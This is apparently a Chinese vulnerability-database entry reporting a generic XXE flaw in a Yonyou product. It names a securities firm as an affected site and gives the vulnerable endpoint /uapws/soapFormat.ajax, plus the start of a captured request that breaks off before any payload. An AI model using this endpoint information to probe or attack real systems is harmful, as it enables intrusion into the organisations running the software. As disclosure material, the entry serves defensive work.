用友某软件存在通用XXE漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ### 详细说明: 1.民生证券 http://**.**.**.**/uapws/ [<img src="https://images.seebug.org/upload/201601/200959349c3a44acc3e242c9b2d455dd416569fe.jpg" alt="Snap331.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/200959349c3a44acc3e242c9b2d455dd416569fe.jpg) [<img src="https://images.seebug.org/upload/201601/200959422139a96b8903b7273200e50e815348b3.jpg" alt="Snap333.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201601/200959422139a96b8903b7273200e50e815348b3.jpg) 抓包 ``` POST /uapws/soapFormat.ajax HTTP/1.1 Host: **.**.**.** User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: http://**.**.**.**/uapws/ Content-Length:...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息